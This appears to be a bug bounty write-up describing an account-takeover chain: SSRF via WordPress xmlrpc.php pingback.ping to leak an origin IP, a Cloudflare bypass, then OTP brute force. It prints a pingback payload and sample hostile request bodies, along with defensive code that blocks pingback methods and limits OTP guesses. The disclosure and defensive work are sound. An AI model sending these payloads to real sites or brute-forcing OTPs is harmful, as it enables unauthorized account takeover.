Tale of 3 vulnerabilities to account takeover!

https://github.com/projectdiscovery/subfinder
pingback.ping method allowed
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param>
      <value><string>[Burp collaborator link]</string></value>
    </param>
    <param>
      <value><string>[Any valid blog post link]</string></value>
    </param>
  </params>
</methodCall>
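The request above is the stock XML-RPC pingback call: the first string parameter is the URL the blog will fetch, the second is one of its own posts. A server that still exposes pingback.ping will connect out to whatever the first parameter names, which is how the origin IP leaks. The following is an added example, not code from the original post: a small inspector a WAF rule or reverse proxy could run over an xmlrpc.php request body. It parses the XML-RPC envelope, pulls out the pingback parameters for logging, and refuses the pingback methods; it also looks inside system.multicall, since a multicall can carry a pingback.ping in its nested structs and a check on only the top-level methodName would miss it. The sample request bodies and the hostnames in them are constructed for the example.

```python
import xml.etree.ElementTree as ET  # stdlib expat does not fetch external entities; defusedxml is the safer choice for untrusted bodies

# Methods that trigger a server-side fetch of a caller-supplied URL.
DENIED_METHODS = {"pingback.ping", "pingback.extensions.getPingbacks"}


def _multicall_methods(root):
    """Collect the 'methodName' members of each struct inside a system.multicall."""
    names = []
    for member in root.iter("member"):
        if (member.findtext("name") or "").strip() != "methodName":
            continue
        value = member.find("value")
        if value is None:
            continue
        text = value.findtext("string")
        if text is None:
            text = value.text or ""
        names.append(text.strip())
    return names


def _top_level_args(root):
    """String parameters of the top-level call (for pingback: source URI, target URI)."""
    args = []
    for value in root.findall("./params/param/value"):
        text = value.findtext("string")
        if text is None:
            text = value.text or ""
        args.append(text.strip())
    return args


def inspect_xmlrpc(body: bytes) -> dict:
    """Decide whether an XML-RPC request body should reach xmlrpc.php.

    Returns a dict with 'allowed', 'reason', every method name found, and
    the top-level arguments so a blocked pingback can be logged with the
    URL the server was being asked to fetch.
    """
    try:
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        return {"allowed": False, "reason": f"malformed XML: {exc}", "methods": [], "args": []}
    if root.tag != "methodCall":
        return {"allowed": False, "reason": "not a methodCall", "methods": [], "args": []}

    top = (root.findtext("methodName") or "").strip()
    methods = [top]
    if top == "system.multicall":
        methods += _multicall_methods(root)  # nested calls count too
    args = _top_level_args(root)

    denied = sorted(set(methods) & DENIED_METHODS)
    if denied:
        return {"allowed": False, "reason": "denied method: " + ", ".join(denied),
                "methods": methods, "args": args}
    return {"allowed": True, "reason": "ok", "methods": methods, "args": args}


# Constructed sample bodies (hostnames are placeholders, not real sites).
SAMPLE_PINGBACK = b"""<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param><value><string>http://collaborator.example/probe</string></value></param>
    <param><value><string>https://blog.example/2020/01/post</string></value></param>
  </params>
</methodCall>"""

SAMPLE_MULTICALL = b"""<?xml version="1.0"?>
<methodCall>
  <methodName>system.multicall</methodName>
  <params><param><value><array><data>
    <value><struct>
      <member><name>methodName</name><value><string>pingback.ping</string></value></member>
      <member><name>params</name><value><array><data>
        <value><string>http://collaborator.example/probe</string></value>
        <value><string>https://blog.example/2020/01/post</string></value>
      </data></array></value></member>
    </struct></value>
  </data></array></value></param></params>
</methodCall>"""

SAMPLE_BENIGN = b"""<?xml version="1.0"?>
<methodCall><methodName>system.listMethods</methodName><params/></methodCall>"""

if __name__ == "__main__":
    for name, body in [("pingback", SAMPLE_PINGBACK), ("multicall", SAMPLE_MULTICALL), ("benign", SAMPLE_BENIGN)]:
        print(name, inspect_xmlrpc(body))
```

Blocking at the edge is a stopgap; the durable fix on the WordPress side is to remove the pingback methods from the XML-RPC method table (or disable XML-RPC entirely if nothing needs it). Either way, an origin that answers directly from the internet stays exposed once its address is known, so restricting inbound traffic at the origin to the CDN's published address ranges is the usual companion control.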
  1. I found SSRF on the blog page by exploiting xmlrpc.php to obtain the origin server's IP,
  2. Used the origin server's IP to bypass Cloudflare by reaching the origin server directly, and
  3. Brute forced the OTP to take over the victim's account (as "rate limiting" wasn't enforced on the server side)
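Step 3 worked because the origin accepted an unlimited number of OTP guesses once Cloudflare was out of the path, so the control has to live in the application itself rather than at the edge. The following is an added example, not code from the original post, of what server-side OTP handling looks like when it cannot be brute forced: a per-account challenge that is bound to an expiry, compared in constant time, consumed on first success, and burned after a small number of failures so that a new code must be issued. The class, its method names and the limits are assumptions for illustration; a real deployment would keep the challenge state in a shared store rather than a process-local dict.

```python
import hmac
import secrets
import time
from dataclasses import dataclass


@dataclass
class _Challenge:
    code: str          # the six-digit code that was sent to the user
    issued_at: float   # monotonic-enough timestamp from the injected clock
    failures: int = 0  # wrong guesses against this code so far


class OtpVerifier:
    """Server-side OTP verification with a per-code attempt budget.

    Limits are assumptions for the example: 5 failures burn the code and
    a code lives for 300 seconds. The clock is injectable for testing.
    """

    def __init__(self, max_failures: int = 5, ttl_seconds: int = 300, clock=time.time):
        self.max_failures = max_failures
        self.ttl = ttl_seconds
        self.clock = clock
        self._challenges: dict[str, _Challenge] = {}  # account -> outstanding challenge

    def issue(self, account: str) -> str:
        """Create a fresh code for the account, replacing any outstanding one."""
        code = f"{secrets.randbelow(10**6):06d}"  # CSPRNG, zero-padded to 6 digits
        self._challenges[account] = _Challenge(code=code, issued_at=self.clock())
        return code  # caller delivers this out of band (SMS, email, app)

    def verify(self, account: str, submitted: str) -> str:
        """Return one of: 'ok', 'invalid', 'locked', 'expired', 'no_challenge'."""
        challenge = self._challenges.get(account)
        if challenge is None:
            return "no_challenge"

        if self.clock() - challenge.issued_at > self.ttl:
            del self._challenges[account]
            return "expired"

        # Once the budget is spent the code is dead even if the next guess is right.
        if challenge.failures >= self.max_failures:
            return "locked"

        if hmac.compare_digest(challenge.code.encode(), str(submitted).encode()):
            del self._challenges[account]  # single use: no replay of a correct code
            return "ok"

        challenge.failures += 1
        if challenge.failures >= self.max_failures:
            return "locked"
        return "invalid"


if __name__ == "__main__":
    verifier = OtpVerifier()
    code = verifier.issue("demo-user")
    print("wrong guess:", verifier.verify("demo-user", "000000" if code != "000000" else "000001"))
    print("right code:", verifier.verify("demo-user", code))
    print("replay:", verifier.verify("demo-user", code))
```

With a six-digit code and five guesses per issuance, a guess succeeds with probability 5 in a million per code, which is why burning the code beats a pure requests-per-minute throttle: a throttle only slows an attacker down, while the attempt budget caps the total guesses a single code can ever absorb. Re-issuing should itself be rate limited per account so the attacker cannot simply request a new code after every lockout.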

Security Engineer @Microsoft | DevSecOps | Speaker | Breaking stuff to learn | Featured in Forbes, BBC| Acknowledged by Google, NASA, Yahoo, UN etc

Avinash Jain (@logicbomb)